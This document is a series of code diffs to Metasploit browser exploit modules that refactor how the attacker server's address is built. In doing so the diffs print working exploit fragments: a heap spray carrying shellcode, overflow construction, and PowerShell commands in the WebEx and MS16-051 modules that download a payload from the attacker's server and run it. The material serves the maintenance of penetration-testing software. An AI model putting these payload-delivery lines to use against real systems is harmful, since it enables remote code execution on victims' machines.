           sprayHeap(unescape("#{shellcode}"), 0x#{target.ret.to_s 16}, 0x4000);

--- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       shellcode = Rex::Text.to_unescape(p.encoded)
       url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
+      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
       url << ":" + datastore['SRVPORT'].to_s
       url << get_resource
       js = <<-ENDJS

--- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       shellcode = Rex::Text.to_unescape(p.encoded)
       url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
+      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
       url << ":" + datastore['SRVPORT'].to_s
       url << get_resource
 

--- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
@@ -116,10 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Sending initial HTML")
 
       shellcode = Rex::Text.to_unescape(p.encoded)
-      url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
-      url << ":" + datastore['SRVPORT'].to_s
-      url << get_resource
+      url = get_uri(client)
 
       fname = rand_text_alphanumeric(4)
 

--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -182,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Sending initial HTML")
 
       url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
+      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
       url << ":" + datastore['SRVPORT'].to_s
       url << get_resource
 

--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -181,10 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       print_status("Sending initial HTML")
 
-      url = ((datastore['SSL']) ? "https://" : "http://")
-      url << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : srvhost)
-      url << ":" + datastore['SRVPORT'].to_s
-      url << get_resource
+      url = get_uri(client)
 
       fname = rand_text_alphanumeric(4)
 

--- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
+++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
+++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
@@ -52,9 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    payload_url = "http://"
-    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+    payload_url = "#{get_uri(cli)}/payload"
 
     if (request.uri.match(/payload/))
       return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     url = "http://"
-    url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
 
     # VBScript variables

--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -92,9 +92,8 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    url = "http://"
-    url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
+    url = get_uri(cli)
+    url += '/' unless url.end_with?('/')
 
     # VBScript variables
     clsid = "79956462-F148-497F-B247-DF35A095F80B"

--- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
+++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
@@ -71,9 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    payload_url = "http://"
-    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/#{@payload_rand}"
+    payload_url = "#{get_uri(cli)}/#{@payload_rand}"
 
     if (request.uri.match(/#{@payload_rand}/))
       return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
+++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/#{@payload_rand}"
 
     if (request.uri.match(/#{@payload_rand}/))

--- a/modules/exploits/windows/browser/cisco_webex_ext.rb
+++ b/modules/exploits/windows/browser/cisco_webex_ext.rb
@@ -76,7 +76,7 @@ var msg = {
     GpcSuppressInstallation: btoa("True"),
     GpcFullPage: "True",
     GpcInitCall: btoa("_wsystem(Ex1);"),
-    Ex1: btoa("PowerShell [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; $wc = New-Object System.Net.WebClient ; $pl = $env:temp+'\\#{@payload_exe}' ; $wc.DownloadFile('https://#{srvhost}:#{datastore['SRVPORT']}#{base_uri}/#{@payload_uri}', $pl) ; Start-Process $pl"),
+    Ex1: btoa("PowerShell [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; $wc = New-Object System.Net.WebClient ; $pl = $env:temp+'\\#{@payload_exe}' ; $wc.DownloadFile('https://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{base_uri}/#{@payload_uri}', $pl) ; Start-Process $pl"),
 }
 
 function runcode()

--- a/modules/exploits/windows/browser/cisco_webex_ext.rb
+++ b/modules/exploits/windows/browser/cisco_webex_ext.rb
@@ -76,7 +76,7 @@ var msg = {
     GpcSuppressInstallation: btoa("True"),
     GpcFullPage: "True",
     GpcInitCall: btoa("_wsystem(Ex1);"),
-    Ex1: btoa("PowerShell [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; $wc = New-Object System.Net.WebClient ; $pl = $env:temp+'\\#{@payload_exe}' ; $wc.DownloadFile('https://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{base_uri}/#{@payload_uri}', $pl) ; Start-Process $pl"),
+    Ex1: btoa("PowerShell [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; $wc = New-Object System.Net.WebClient ; $pl = $env:temp+'\\#{@payload_exe}' ; $wc.DownloadFile('https://#{srvhost}:#{datastore['SRVPORT']}#{base_uri}/#{@payload_uri}', $pl) ; Start-Process $pl"),
 }
 
 function runcode()

--- a/modules/exploits/windows/browser/dxstudio_player_exec.rb
+++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb
@@ -61,10 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    url_base = "http://"
-    url_base += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    url_base += ":" + datastore['SRVPORT'].to_s + get_resource()
-
+    url_base = get_uri(cli)
     payload_url = url_base + "/payload"
 
     # handle request for the payload

--- a/modules/exploits/windows/browser/dxstudio_player_exec.rb
+++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     url_base = "http://"
-    url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    url_base += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     url_base += ":" + datastore['SRVPORT'].to_s + get_resource()
 
     payload_url = url_base + "/payload"

--- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
+++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
+++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
@@ -62,9 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    payload_url = "http://"
-    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+    payload_url = "#{get_uri(cli)}/payload"
 
     if (request.uri.match(/payload/))
       return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -170,14 +170,13 @@ class MetasploitModule < Msf::Exploit::Remote
       resp = create_response(301, "Moved Permanently")
       resp.body = ""
 
-      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
       if datastore['SSL']
         schema = "https"
       else
         schema = "http"
       end
 
-      sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{my_host}:#{datastore['SRVPORT']}#{request.uri}.pdf?".length)
+      sploit = rand_text_alpha(my_target['Offset'] - "#{schema}://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{request.uri}.pdf?".length)
       sploit << [my_target.ret].pack("V") # EIP
       sploit << [my_target['WritableAddress']].pack("V") # Writable Address
       sploit << self.send(my_target[:rop])

--- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -170,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote
       resp = create_response(301, "Moved Permanently")
       resp.body = ""
 
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
       if datastore['SSL']
         schema = "https"
       else

--- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
@@ -185,7 +185,7 @@ SetLocale(#{var_origLoc})|)
     end
 
     uri = ((datastore['SSL']) ? "https://" : "http://")
-    uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'])
+    uri << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost)
     uri << ":#{datastore['SRVPORT']}"
 
     print_status("Request received for #{request.uri}");

--- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
+++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
@@ -184,9 +184,7 @@ SetLocale(#{var_origLoc})|)
       return
     end
 
-    uri = ((datastore['SSL']) ? "https://" : "http://")
-    uri << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost)
-    uri << ":#{datastore['SRVPORT']}"
+    uri = get_uri(cli)
 
     print_status("Request received for #{request.uri}");
 

--- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
+++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
@@ -180,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # HTML requests sent by IE and Firefox
       #
       # This could probably use the Host header from the request
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
 
       # Always prepare the UNC path, even if we dont use it for this request...
       if (datastore['UNCPATH'])

--- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
+++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
@@ -179,14 +179,12 @@ class MetasploitModule < Msf::Exploit::Remote
       #
       # HTML requests sent by IE and Firefox
       #
-      # This could probably use the Host header from the request
-      my_host = srvhost_addr
 
       # Always prepare the UNC path, even if we dont use it for this request...
       if (datastore['UNCPATH'])
         unc = datastore['UNCPATH'].dup
       else
-        unc = "\\\\" + my_host + "\\" + share_name
+        unc = "\\\\" + srvhost_addr + "\\" + share_name
       end
       jnlp = "-J-XXaltjvm=" + unc + " -Xnosplash " + rand_text_alphanumeric(8 + rand(8)) + ".jnlp"
       docbase = rand_text_alphanumeric(8 + rand(8))

--- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
+++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
@@ -180,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # HTML requests sent by IE and Firefox
       #
       # This could probably use the Host header from the request
-      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
+      my_host = srvhost_addr
 
       # Always prepare the UNC path, even if we dont use it for this request...
       if (datastore['UNCPATH'])

--- a/modules/exploits/windows/browser/java_ws_double_quote.rb
+++ b/modules/exploits/windows/browser/java_ws_double_quote.rb
@@ -175,8 +175,8 @@ class MetasploitModule < Msf::Exploit::Remote
       if (datastore['UNCPATH'])
         unc = datastore['UNCPATH'].dup
       else
-        my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-        unc = '\\\\' + my_host + '\\' + share_name
+        my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
+        unc = "\\\\" + my_host + "\\" + share_name
       end
 
       # NOTE: we ensure there's only a single backslash here since it will get escaped

--- a/modules/exploits/windows/browser/java_ws_double_quote.rb
+++ b/modules/exploits/windows/browser/java_ws_double_quote.rb
@@ -175,8 +175,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if (datastore['UNCPATH'])
         unc = datastore['UNCPATH'].dup
       else
-        my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-        unc = "\\\\" + my_host + "\\" + share_name
+        unc = "\\\\" + srvhost_addr + "\\" + share_name
       end
 
       # NOTE: we ensure there's only a single backslash here since it will get escaped

--- a/modules/exploits/windows/browser/java_ws_vmargs.rb
+++ b/modules/exploits/windows/browser/java_ws_vmargs.rb
@@ -181,9 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if (datastore['UNCPATH'])
         unc = datastore['UNCPATH'].dup
       else
-        # This could probably use the Host header from the request
-        my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-        unc = "\\\\" + my_host + "\\" + share_name
+        unc = "\\\\" + srvhost_addr + "\\" + share_name
       end
 
       # NOTE: we ensure there's only a single backslash here since it will get escaped

--- a/modules/exploits/windows/browser/java_ws_vmargs.rb
+++ b/modules/exploits/windows/browser/java_ws_vmargs.rb
@@ -182,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
         unc = datastore['UNCPATH'].dup
       else
         # This could probably use the Host header from the request
-        my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+        my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
         unc = "\\\\" + my_host + "\\" + share_name
       end
 

--- a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb
+++ b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
       #
       # HTML requests sent by IE and Firefox
       #
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
       path = request.uri.gsub(/\//, '\\\\\\')
       payload_unc = '\\\\\\\\' + my_host + path + @var_exe_name + '.chm'
       mof_unc = '\\\\\\\\' + my_host + path + @var_mof_name + '.chm'

--- a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb
+++ b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
       #
       # HTML requests sent by IE and Firefox
       #
-      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
+      my_host = srvhost_addr
       path = request.uri.gsub(/\//, '\\\\\\')
       payload_unc = '\\\\\\\\' + my_host + path + @var_exe_name + '.chm'
       mof_unc = '\\\\\\\\' + my_host + path + @var_mof_name + '.chm'

--- a/modules/exploits/windows/browser/macrovision_unsafe.rb
+++ b/modules/exploits/windows/browser/macrovision_unsafe.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/macrovision_unsafe.rb
+++ b/modules/exploits/windows/browser/macrovision_unsafe.rb
@@ -52,9 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    payload_url = "http://"
-    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+    payload_url = "#{get_uri(cli)}/payload"
 
     if (request.uri.match(/payload/))
       return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
@@ -342,7 +342,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     return '<img src="moz-icon:file://///' +
-           srvhost +
+           srvhost_addr +
            path + '/' + rand_text_alphanumeric(rand(80) + 16) + '.ani">'
   end
 

--- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
@@ -342,7 +342,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     return '<img src="moz-icon:file://///' +
-           datastore['SRVHOST'] +
+           srvhost +
            path + '/' + rand_text_alphanumeric(rand(80) + 16) + '.ani">'
   end
 

--- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
+++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
+++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
@@ -60,9 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    payload_url = "http://"
-    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+    payload_url = "#{get_uri(cli)}/payload"
 
     if (request.uri.match(/payload/))
       return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
+++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
@@ -174,11 +174,10 @@ class MetasploitModule < Msf::Exploit::Remote
       #
       # HTML requests sent by IE and Firefox
       #
-      my_host = srvhost_addr
       name = rand_text_alphanumeric(rand(8) + 8)
       # path = get_resource.gsub(/\//, '\\')
       path = request.uri.gsub(/\//, '\\')
-      unc = '\\\\' + my_host + path + name + '.hlp'
+      unc = '\\\\' + srvhost_addr + path + name + '.hlp'
       print_status("Using #{unc} ...")
       html = %Q|<html>
 <script type="text/vbscript">

--- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
+++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
@@ -174,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
       #
       # HTML requests sent by IE and Firefox
       #
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
       name = rand_text_alphanumeric(rand(8) + 8)
       # path = get_resource.gsub(/\//, '\\')
       path = request.uri.gsub(/\//, '\\')

--- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
+++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
@@ -174,7 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
       #
       # HTML requests sent by IE and Firefox
       #
-      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
+      my_host = srvhost_addr
       name = rand_text_alphanumeric(rand(8) + 8)
       # path = get_resource.gsub(/\//, '\\')
       path = request.uri.gsub(/\//, '\\')

--- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    @my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
+    @my_host = srvhost_addr
     webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
     @url_base = "http://" + @my_host
 

--- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    @my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    @my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
     @url_base = "http://" + @my_host
 

--- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
+++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
@@ -134,10 +134,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def process_propfind(cli, request)
     path = request.uri
     print_status("Received WebDAV PROPFIND request for #{path}")
-    body = ''
-
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    my_uri = "http://#{my_host}/"
 
     if path =~ /\.dll$/i
       # Response for the DLL

--- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
+++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
@@ -83,9 +83,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    webdav = "\\\\#{myhost}\\"
-
     if (request.uri =~ /\.dll$/i)
       print_status "Sending DLL payload"
       return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
+++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if (request.uri =~ /\.dll$/i)
@@ -139,7 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Received WebDAV PROPFIND request for #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path =~ /\.dll$/i
@@ -422,7 +422,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['UNCHOST'])
       unc << datastore['UNCHOST'].dup
     else
-      unc << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+      unc << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost)
     end
     unc << "\\"
     unc << rand_text_alpha(rand(8) + 4)

--- a/modules/exploits/windows/browser/ms16_051_vbscript.rb
+++ b/modules/exploits/windows/browser/ms16_051_vbscript.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit_html(req_uri)
-    srvhost = datastore['SRVHOST']
+    srvhost = srvhost
     srvport = datastore['SRVPORT']
 
     template = <<-EOF
@@ -417,7 +417,7 @@ class MetasploitModule < Msf::Exploit::Remote
                 overwrite arg1, olescript + &H174
 
                 Set shObj = CreateObject("Wscript.shell")
-                shObj.Run("PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'\\#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d")
+                shObj.Run("PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'\\#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{srvhost}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d")
                 shObj.Run("%temp%\\#{@payload_exe}")
 
             End Function

--- a/modules/exploits/windows/browser/ms16_051_vbscript.rb
+++ b/modules/exploits/windows/browser/ms16_051_vbscript.rb
@@ -57,9 +57,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit_html(req_uri)
-    srvhost = srvhost
-    srvport = datastore['SRVPORT']
-
     template = <<-EOF
     <html>
     <head>
@@ -284,7 +281,7 @@ class MetasploitModule < Msf::Exploit::Remote
             function getdll(downloadFile)
             {
                 oReq = new XMLHttpRequest();
-                oReq.open("GET", "http://#{srvhost}:#{srvport}#{req_uri}/"+downloadFile, true);
+                oReq.open("GET", "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{req_uri}/"+downloadFile, true);
                 oReq.onreadystatechange = handler;
                 oReq.send();
             }

--- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb
+++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb
@@ -78,14 +78,6 @@ class MetasploitModule < Msf::Exploit::Remote
     @javascript_encode_key = rand_text_alpha(rand(10) + 10)
   end
 
-  def get_srvhost
-    # If the SRVHOST isn't the default 0.0.0.0, obviously the user wants to
-    # specify, so we will not force source_address()
-    return srvhost if srvhost != '0.0.0.0'
-
-    Rex::Socket.source_address(cli.peerhost)
-  end
-
   def on_request_uri(cli, request)
     if (request.uri.match(/\.gif$/i))
 
